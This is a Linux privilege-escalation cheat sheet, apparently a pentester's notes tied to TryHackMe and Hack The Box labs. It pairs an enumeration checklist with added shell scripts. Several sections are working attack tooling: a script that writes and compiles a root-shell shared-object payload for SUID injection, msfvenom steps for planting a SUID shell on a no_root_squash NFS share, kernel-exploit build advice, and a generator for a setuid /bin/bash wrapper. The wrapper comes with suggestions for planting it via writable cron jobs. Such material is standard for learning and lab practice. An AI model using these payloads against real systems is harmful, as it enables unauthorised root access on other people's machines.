Linux Privilege Escalation
OS & User Enumeration :
PrivEsc Checklist :
Sensitive files and permission misconfiguration (readable SSH private keys, readable /etc/shadow, writable /etc/passwd or /etc/shadow)
SUID / SGID binaries (find / -type f -perm -4000 2>/dev/null; anything outside the distro's default set deserves a look)
Internal ports (services bound to 127.0.0.1 only: ss -tlnp or netstat -tlnp)
Processes running as root (ps aux; check what they read, write and execute)
Cron tabs (/etc/crontab, /etc/cron.d/, /var/spool/cron/; writable scripts, relative PATH, wildcards in tar/rsync jobs)
Cron jobs you cannot read: watch process activity with pspy
Mounted filesystems (mount, df -h, /etc/fstab; nosuid/noexec flags, credentials stored in fstab)
TMUX session hijacking (root-owned tmux socket with loose permissions: tmux -S /path/to/socket)
Path hijacking (writable directory in the PATH of a root-run script or binary that calls commands without an absolute path)
Sudo token hijacking via process injection (https://github.com/nongiach/sudo_inject): ptrace into another process of a user whose sudo timestamp is still valid; needs ptrace allowed (kernel.yama.ptrace_scope = 0)
Docker (docker ps; membership of the docker group or write access to /var/run/docker.sock is effectively root)
Interesting groups (https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe):
  wheel (usually allowed to sudo via %wheel in sudoers)
  shadow (read /etc/shadow, crack the hashes)
  disk (raw access to block devices: debugfs or dd on the root filesystem bypasses file permissions)
  video (read the framebuffer, /dev/fb0, to capture what is on screen)
  root
  docker
Environment variables (LD_PRELOAD / LD_LIBRARY_PATH kept by sudo env_keep, PATH used by SUID binaries)
bash < 4.2-048: SUID binary that runs a command by absolute path, export a shell function whose name is that path
bash < 4.4: SUID binary that runs bash, SHELLOPTS=xtrace with PS4='$(payload)' (https://tryhackme.com/room/linuxprivesc Task 14, 15)
NFS misconfiguration (rw export with no_root_squash in /etc/exports)
linpeas.sh -a   # run all checks
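A few of the checklist items above written as small shell functions, so each check can be run on its own without linpeas. This is an added example, not part of the original notes or of any tool they mention; it assumes only POSIX sh, find, awk and tr, and the crontab format it parses is the system one (min hour dom mon dow user command).

```bash
#!/bin/sh
# Added example: checklist items as stand-alone shell checks.

# Path hijacking precondition: directories in a PATH string that we can
# write to. Pass the PATH of the root-run script or cron job you are
# looking at (read it from its environment or the crontab); defaults to ours.
writable_path_dirs() {
    printf '%s\n' "${1:-$PATH}" | tr ':' '\n' | while IFS= read -r d; do
        if [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ]; then
            printf '%s\n' "$d"
        fi
    done
    return 0
}

# SUID/SGID files under a root (default /). Compare against what the distro
# ships and look at anything under /usr/local, /opt or a home directory first.
suid_sgid_binaries() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
    return 0
}

# Cron: commands in a system crontab (field 7 onward) that we could replace.
# Only absolute paths are considered; a relative command name is a path
# hijacking case, handled by writable_path_dirs on the job's PATH.
writable_cron_targets() {
    awk '!/^[[:space:]]*(#|$)/ && NF >= 7 && $7 ~ /^\// { print $7 }' "$1" 2>/dev/null |
    while IFS= read -r cmd; do
        if [ -w "$cmd" ]; then printf '%s\n' "$cmd"; fi
    done
    return 0
}

run_all() {
    echo "[*] writable dirs in PATH:";    writable_path_dirs
    echo "[*] SUID/SGID files:";          suid_sgid_binaries /
    echo "[*] writable cron targets:";    writable_cron_targets /etc/crontab
}

# ./checks.sh --run executes everything; sourcing the file gives you the functions.
if [ "${1:-}" = "--run" ]; then run_all; fi
```

Run it as the low-privileged user you landed as: the point of each check is what that user can write, not what root can.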
SUID Shared Object Injection :
Find a SUID binary that looks out of place (custom path such as /usr/local/bin, not owned by a distro package)
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"
Look for a shared object it tries to load and fails on (ENOENT, "No such file or directory"); if the directory it was searched in is writable by you, or does not exist but its parent does, that is the injection point
Create a shared object under that exact name whose constructor runs as root (setuid(0); system("/bin/bash -p")), built with gcc -shared -fPIC
Run the SUID binary; the loader pulls in your object before main() runs
Caveat: this only works when the search location comes from the binary itself (RPATH/RUNPATH or a dlopen() path); ld.so ignores LD_LIBRARY_PATH and LD_PRELOAD for setuid binaries, so you cannot redirect the lookup from the environment
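The strace step above produces a lot of noise; the following added example (not from the original notes) filters it down to shared objects the binary failed to load from a location you can create, and writes the constructor payload for one of them. The strace lines it parses are the usual `open(...) = -1 ENOENT` form; the payload source is an assumption of this example, and `plant_so` assumes gcc is available where you build.

```bash
#!/bin/sh
# Added example: from strace output to a planted shared object.

# Absolute .so paths from ENOENT lines such as
#   open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
missing_so_paths() {
    grep -E 'ENOENT' "$@" | grep -oE '"/[^"]*\.so[^"]*"' | tr -d '"' | sort -u
    return 0
}

# Keep only paths we can actually create: the directory exists and is
# writable, or it does not exist but its nearest existing ancestor is
# (then mkdir -p fills in the rest, as with a missing ~/.config/).
injectable_so_paths() {
    missing_so_paths "$@" | while IFS= read -r so; do
        d=$(dirname "$so")
        while [ ! -e "$d" ] && [ "$d" != "/" ]; do d=$(dirname "$d"); done
        if [ -d "$d" ] && [ -w "$d" ]; then printf '%s\n' "$so"; fi
    done
    return 0
}

# Payload source: a constructor runs when the object is mapped, before the
# SUID binary's main(), with euid 0. setgid/setuid make the real ids 0 too
# so the shell does not drop privileges; exit() keeps the host from running on.
write_so_payload() {
    cat > "$1" <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void __attribute__((constructor)) inject(void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
    exit(0);
}
EOF
    printf '%s\n' "$1"
}

# Build the object at the exact path the binary looks for, creating
# directories as needed; afterwards just run the SUID binary.
plant_so() {
    so="$1"; src="${2:-/tmp/payload.c}"
    write_so_payload "$src" >/dev/null
    mkdir -p "$(dirname "$so")"
    gcc -shared -fPIC -o "$so" "$src"
}

# usage: ./soinject.sh strace.txt   (strace output saved with 2>&1 > strace.txt)
if [ -n "${1:-}" ]; then injectable_so_paths "$1"; fi
```

If the list is empty but the binary clearly loads something custom, rerun strace with `-f` (it may spawn a helper) and check `readelf -d` for RPATH/RUNPATH entries pointing somewhere writable.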
NFS Misconfiguration :
https://tryhackme.com/room/linuxprivesc (Task 19)
cat /etc/exports   # on the target: you need rw and no_root_squash; with root_squash (the default) root on the client is mapped to nobody and the SUID bit below is useless
showmount -e 10.10.10.10   # from the attacker box, confirm the export is reachable
On Kali (as root, so the files you create on the share are owned by uid 0 on the server)
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs   # vers=2 as in the room; drop it if the server only speaks v3/v4
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf   # linux/x64/exec for a 64-bit target
chmod +xs /tmp/nfs/shell.elf   # SUID+SGID root, because the owner is root on the server side
On Target
/tmp/shell.elf   # the export is /tmp on the server, so the file lands there; -p keeps the effective uid 0
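Reading /etc/exports by eye is error-prone once there are several clients per line, so here is an added example (not from the original notes or the TryHackMe room) that parses an exports file and prints only the shares where the SUID drop above can work: writable and not root-squashed. It assumes the exportfs defaults (clients default to everyone, options default to ro and root_squash); the exports file in the usage note is constructed.

```bash
#!/bin/sh
# Added example: which exports let a remote root keep uid 0.

# One line per (export, client): path, client, squash setting, access mode.
exports_report() {
    sed 's/#.*//' "${1:-/etc/exports}" | awk '
    NF >= 1 {
        path = $1
        if (NF == 1) { print path, "*", "root_squash", "ro"; next }
        for (i = 2; i <= NF; i++) {
            n = split($i, part, "(")
            client = (part[1] == "") ? "*" : part[1]   # "(rw)" alone means every client
            opts = (n > 1) ? part[2] : ""
            sub(/\)$/, "", opts)
            squash = (opts ~ /(^|,)no_root_squash(,|$)/) ? "no_root_squash" : "root_squash"
            mode   = (opts ~ /(^|,)rw(,|$)/) ? "rw" : "ro"
            print path, client, squash, mode
        }
    }'
    return 0
}

# Just the shares where planting a root-owned SUID file works.
exploitable_exports() {
    exports_report "$@" | awk '$3 == "no_root_squash" && $4 == "rw" { print $1, $2 }'
    return 0
}

# usage: ./exports_check.sh [/path/to/exports]   (default /etc/exports)
if [ -r "${1:-/etc/exports}" ]; then exploitable_exports "${1:-/etc/exports}"; fi
```

For a constructed file containing `/tmp *(rw,sync,no_root_squash)` and `/srv/share 10.0.0.0/24(rw,sync) *(ro)`, only `/tmp *` is reported as exploitable: the rw client on /srv/share is still root-squashed, and `*` only gets ro. The client column matters too; if the export is restricted to one subnet, your mount has to come from an address in it, which `showmount -e` will not tell you.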
Kernel Exploits :
cat /proc/version
uname -r
uname -mrs   # kernel release and architecture: picks both the exploit and the -m32/-m64 build
cat /etc/lsb-release
cat /etc/os-release
gcc exploit.c -o exp
Compile on the local machine and upload to the target when it has no gcc; match the target's architecture, and either build against an old enough glibc or link statically (-static) so the binary does not depend on the target's libc
For a 32-bit target from a 64-bit Kali:
apt-get install gcc-multilib
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542   # --hash-style=both so an old ld.so on the target can still resolve symbols
Caveat: a kernel exploit that fails can panic the box; confirm the exact kernel version and distro patch level (the distro often backports fixes without bumping uname -r) before running anything
Recover Deleted Files :
extundelete (HTB Mirai - https://tiagotavares.io/2017/11/mirai-hack-the-box-retired/): recovers deleted files from an ext3/ext4 image or an unmounted device (extundelete /dev/sdb --restore-all)
strings on the raw device or image when the filesystem metadata is gone (strings /dev/sdb | grep -i <keyword>)
C Program to SetUID /bin/bash :
suid.c must call setuid(0) (and setgid(0)) or exec bash with -p; otherwise bash notices euid != uid and drops back to the real user
gcc -Wall suid.c -o exploit
sudo chown root exploit
sudo chmod u+s exploit   # chown first: changing the owner afterwards clears the setuid bit
$ ls -l exploit
-rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit
$ ./exploit
# whoami
root
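The notes do not show suid.c itself. The following added example (my code, not the notes' original file) writes a minimal version and builds it with the same gcc flags, leaving the chown/chmod to root as above. It assumes /bin/bash exists on the target and that gcc is present where you build.

```bash
#!/bin/sh
# Added example: generate and build a setuid wrapper around /bin/bash.

# Writes the C source to $1 (default suid.c) and prints the path.
write_suid_source() {
    out="${1:-suid.c}"
    cat > "$out" <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Run from a root-owned setuid binary: euid is already 0, so setuid(0)
 * also sets the real and saved uid to 0 and bash will not drop privileges.
 * setgid(0) must come first, while we still have the privilege to do it.
 * -p is belt and braces: bash keeps euid even if the ids ever differ. */
int main(void)
{
    if (setgid(0) != 0 || setuid(0) != 0) {
        perror("setuid");
        return 1;
    }
    execl("/bin/bash", "bash", "-p", (char *)NULL);
    perror("execl");
    return 1;
}
EOF
    printf '%s\n' "$out"
}

# Compiles $1 into $2 (default exploit) and prints the two commands root
# still has to run. The setuid bit is not set here on purpose: it would be
# cleared by the later chown anyway, and only root can make it meaningful.
build_suid() {
    src="$1"; bin="${2:-exploit}"
    gcc -Wall "$src" -o "$bin" || return 1
    printf 'now run: sudo chown root %s && sudo chmod u+s %s\n' "$bin" "$bin"
}

# usage: ./mksuid.sh && sudo chown root exploit && sudo chmod u+s exploit
if [ "${1:-}" = "--build" ]; then build_suid "$(write_suid_source suid.c)" exploit; fi
```

The same wrapper is what you drop wherever you already have a way to get a root-owned setuid file: a writable cron script that copies it into place, or an NFS export with no_root_squash as in the section above.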
Tools :
Resources :